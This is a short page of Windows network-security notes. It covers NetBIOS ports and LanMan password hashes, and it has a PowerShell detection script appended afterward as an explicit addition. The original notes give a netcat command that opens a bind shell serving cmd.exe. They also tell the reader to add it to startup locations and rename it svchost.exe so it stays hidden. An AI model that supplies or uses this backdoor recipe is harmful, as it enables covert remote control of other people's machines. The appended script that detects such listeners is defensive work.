This document is a list of Windows vulnerability documents and links to applications commonly used to evaluate Windows-based networks for security problems. The information within and the links to tools are for security evaluation and educational use. Any damage and liability caused to any party due to the misuse of these resources is disclaimed.

SMB

NetBIOS ports: 137-139, 445

NetBIOS LanMan passwords can be found in the registry at
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan. They are hashed,
but can be cracked with brute-force engines.

Notes:

You can use netcat to create a trojan on Windows machines. Make netcat
emulate the Telnet negotiation by invoking the -t option. Use the -l
option to invoke listen mode, use -p port# to specify the port to
bind, and finally -e command to specify the command to run once a
telnet connection arrives on port#. This can be run from the command
line or put into one of the Windows startup locations. You may also change the
name of nc.exe and its internal id strings to svchost.exe to make it less
obvious in Task Manager.

	c:\>nc.exe -t -l -p 999 -e cmd.exe
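As a defender-side counterpart to the note above, here is an added PowerShell check (not part of the original document) that lists listening TCP endpoints owned by a netcat-like process, or by a process named svchost.exe that is not running from a Windows system directory, and that scans the Run keys for startup entries pointing at such a renamed binary. It assumes Windows 8 / Server 2012 or later (Get-NetTCPConnection) and that it is run with enough rights to read other processes' image paths.

```powershell
# Added defensive check; the names below are assumptions about what a renamed
# netcat listener would look like, based on the note above.
$systemDirs = @((Join-Path $env:SystemRoot 'System32'),
                (Join-Path $env:SystemRoot 'SysWOW64'))   # legitimate svchost.exe homes
$suspiciousNames = @('nc', 'nc64', 'ncat', 'netcat')

function Test-InSystemDir([string]$path) {
    foreach ($dir in $systemDirs) {
        if ($path.StartsWith($dir, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

# 1. Listening sockets whose owning process looks like a (renamed) netcat
$listeners = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue
foreach ($conn in $listeners) {
    $proc = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
    if (-not $proc) { continue }
    $path = $proc.Path          # $null when the caller may not inspect the process
    $reasons = @()
    if ($suspiciousNames -contains $proc.ProcessName.ToLower()) {
        $reasons += 'netcat-like image name'
    }
    if ($proc.ProcessName -ieq 'svchost' -and $path -and -not (Test-InSystemDir $path)) {
        $reasons += "svchost.exe running from $path"
    }
    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            LocalPort = $conn.LocalPort; PID = $proc.Id
            Process   = $proc.ProcessName; Path = $path
            Reason    = ($reasons -join '; ')
        }
    }
}

# 2. Run-key entries launching a file named svchost.exe from outside the system dirs
$sysPattern = ($systemDirs | ForEach-Object { [regex]::Escape($_) }) -join '|'
$runKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run')
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }    # skip provider metadata properties
        $value = [string]$p.Value
        if ($value -match 'svchost\.exe' -and $value -notmatch $sysPattern) {
            "$key\$($p.Name) -> $value"
        }
    }
}
```

Any hit on a non-standard port with a Reason column populated is worth a closer look at the binary's hash and its parent process; a legitimate svchost.exe is started by services.exe from System32 or SysWOW64.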